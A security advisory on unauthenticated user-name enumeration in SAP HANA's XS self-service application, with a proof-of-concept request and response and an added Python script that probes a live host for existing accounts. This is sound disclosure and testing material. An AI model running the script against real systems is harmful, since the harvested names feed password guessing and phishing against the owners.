[ERPSCAN-17-052] Information disclosure in SAP HANA XS classic user self-service
Application: SAP HANA
Versions Affected: SAP HANA SPS12, SPS10, SAP HANA 2.0
Vendor URL: SAP
Bug: Information Disclosure
Reported: 20.06.2017
Vendor response: 21.06.2017
Date of Public Advisory: 12.12.2017
Reference: SAP Security Note 2549983
Author: Mikhail Medvedev (ERPScan)
VULNERABILITY INFORMATION
Class: Information Disclosure
Risk: Medium
Impact: loss of information and system configuration confidentiality
Remotely Exploitable: Yes
Locally Exploitable: No
CVSS Information
CVSS v3 Base Score: 5.3 / 10
CVSS v3 Base Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
AV: Attack Vector (Related exploit range) | Network (N) |
AC: Attack Complexity (Required attack complexity) | Low (L) |
PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
UI: User Interaction (Required user participation) | None (N) |
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
C: Impact to Confidentiality | Low (L) |
I: Impact to Integrity | None (N) |
A: Impact to Availability | None (N) |
DESCRIPTION
A remote unauthenticated attacker can enumerate existing SAP HANA user names by abusing the account request functionality of the user self-service application.
BUSINESS RISK
An attacker can use an information disclosure vulnerability to reveal additional information (system data, debugging information, etc.), learn about the system, and plan further attacks. Here, a list of valid database user names is the natural starting point for password guessing or phishing against the HANA system.
VULNERABLE PACKAGES
SAP HANA DATABASE 1.00 SP122
SAP HANA DATABASE 2.0 SP002
SAP HANA DATABASE 2.0 SP012
SAP HANA DATABASE 2.0 SP020
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2549983
TECHNICAL DESCRIPTION
The self-service application passes the submitted user name into a database statement and, when the name is already taken, returns the raw database error to the unauthenticated caller. Because that error echoes the name ("user name already exists: <username>"), an attacker can submit candidate names to the createNewUser action and distinguish existing HANA users from non-existing ones by the response: a taken name yields the HTTP 500 with the "already exists" message, while a free name does not. The check is therefore a simple string match on the response body.
REQUEST:
POST /sap/hana/xs/selfService/user/selfService.xsjs HTTP/1.1
Host: host:port
Content-Length: 87
Connection: close

{"action":"createNewUser","username":"<username>/**/","email":"","x-sap-origin-location":""}

RESPONSE:
HTTP/1.1 500 Internal Server Error
content-type: text/plain; charset=utf-8
content-length: 140
cache-control: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
date: Wed, 26 Apr 2017 10:21:43 GMT

{"name":"SystemError","message":"dberror(Connection.prepareStatement): 331 - user name already exists: <username>: line 1 col 24 (at pos 23)"}
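The following script turns the request/response pair above into a repeatable check. It is an added example written for this page, not ERPScan's proof-of-concept code or anything shipped by SAP: it builds the createNewUser body exactly as shown in the advisory, classifies each response by the "user name already exists" error text, and runs the same logic over a set of constructed responses so it can be exercised offline. The host name, the candidate user names and the fake responses are assumptions for illustration; only the endpoint path, the action name, the JSON body and the error string come from the advisory.

```python
"""Enumeration harness for the SAP HANA XS user self-service endpoint.

Added example, not the advisory's or SAP's code. Everything marked
'constructed' or 'assumed' below is invented for the illustration.
"""
import json
import re
import urllib.error
import urllib.request

# Endpoint and action taken from the advisory's proof of concept.
SELF_SERVICE_PATH = "/sap/hana/xs/selfService/user/selfService.xsjs"
ACTION = "createNewUser"

# Error text quoted in the advisory's 500 response. The user name is echoed
# back after the colon, which is what makes the leak reliable to detect.
EXISTS_RE = re.compile(r"user name already exists:\s*([^\s:]+)")


def build_payload(username: str) -> bytes:
    """Body of the createNewUser request as published in the advisory,
    including the trailing SQL comment '/**/' the PoC appends to the name."""
    body = {
        "action": ACTION,
        "username": username + "/**/",
        "email": "",
        "x-sap-origin-location": "",
    }
    return json.dumps(body, separators=(",", ":")).encode()


def classify(status: int, body: str):
    """Map one HTTP response to (verdict, echoed_name).

    'exists'  - the server leaked that the name is already taken
    'unknown' - anything else: name free, validation error, or a generic
                500 that no longer echoes the name (expected after
                SAP Security Note 2549983 is applied)
    """
    if status == 500:
        try:
            msg = json.loads(body).get("message", "")
        except (ValueError, AttributeError):
            msg = body  # not JSON, or not an object: match on the raw text
        m = EXISTS_RE.search(msg)
        if m:
            return "exists", m.group(1)
    return "unknown", None


def enumerate_users(candidates, send):
    """Probe every candidate name through send(username) -> (status, body)
    and return the names the server confirmed as existing. The transport is
    injected so the classification logic can be tested without a target."""
    found = []
    for name in candidates:
        verdict, echoed = classify(*send(name))
        if verdict == "exists":
            found.append(echoed or name)
    return found


def live_sender(base_url: str):
    """Real transport (unauthenticated POST, as the advisory states).
    base_url is assumed, e.g. 'https://hana.example.internal:4300'."""
    def send(username):
        req = urllib.request.Request(
            base_url + SELF_SERVICE_PATH,
            data=build_payload(username),
            headers={"Content-Type": "application/json"},
            method="POST",
        )
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.status, resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            return err.code, err.read().decode("utf-8", "replace")
    return send


# Constructed responses for an offline run (NOT captured from a real system).
# Two names trigger the leaky error, one is free, and the last imitates a
# server that returns a 500 without echoing the name.
FAKE_RESPONSES = {
    "SYSTEM": (500, '{"name":"SystemError","message":"dberror(Connection.prepareStatement): '
                    '331 - user name already exists: SYSTEM: line 1 col 24 (at pos 23)"}'),
    "DBADMIN": (500, '{"name":"SystemError","message":"dberror(Connection.prepareStatement): '
                     '331 - user name already exists: DBADMIN: line 1 col 24 (at pos 23)"}'),
    "NOBODY_HERE": (200, '{"status":"ok"}'),
    "PATCHED_PROBE": (500, '{"name":"SystemError","message":"internal error"}'),
}


def fake_sender(username):
    """Offline stand-in for live_sender(); unknown names get an empty 200."""
    return FAKE_RESPONSES.get(username, (200, "{}"))


if __name__ == "__main__":
    print(enumerate_users(FAKE_RESPONSES, fake_sender))
    # Against a real host: enumerate_users(names, live_sender("https://host:port"))
```

Two practical caveats. The endpoint is the account request function, so a probe for a name that does not exist may file a genuine account request or notify an administrator; keep candidate lists short and agree the test with the system owner. Second, the same classify() function doubles as a post-patch check: after the note is installed, a known-existing name should come back as "unknown", i.e. the response must no longer contain the echoed user name.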